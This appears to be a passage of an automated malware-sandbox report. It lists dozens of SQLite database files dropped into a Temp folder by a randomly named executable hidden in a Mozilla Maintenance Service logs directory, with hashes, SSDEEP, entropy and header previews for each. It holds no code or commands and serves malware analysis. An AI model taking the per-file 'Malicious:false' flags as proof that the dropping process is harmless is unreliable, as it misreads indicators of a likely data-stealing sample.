                                                                    MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                    SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                    SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                    SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\GyKL51uv6H

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\H8kF97s8Ir

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\HLl50hpTKF

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\HPvj9VE44q

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\HRoT1kEx0M

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\HdKc0JkvX0

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\I1mpxaTgOK

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\IUyjZk2rwA

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\Id6CdDCKzc

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\IjnpDoe4IY

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\IpomdcHq6k

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\IxPKP3WGLZ

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\J8jzGi6f23

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\JRO1iOWJto

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\K2XV8uyc9M

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\KLvsz30bz4

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\KXbdMaEfsO

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\KecTZRRqo9

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\KgQNgxZwU9

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\LaRj60xhfn

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\LmC260Yn7b

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\LxT2Jq12XW

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\MamfNC6oXa

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
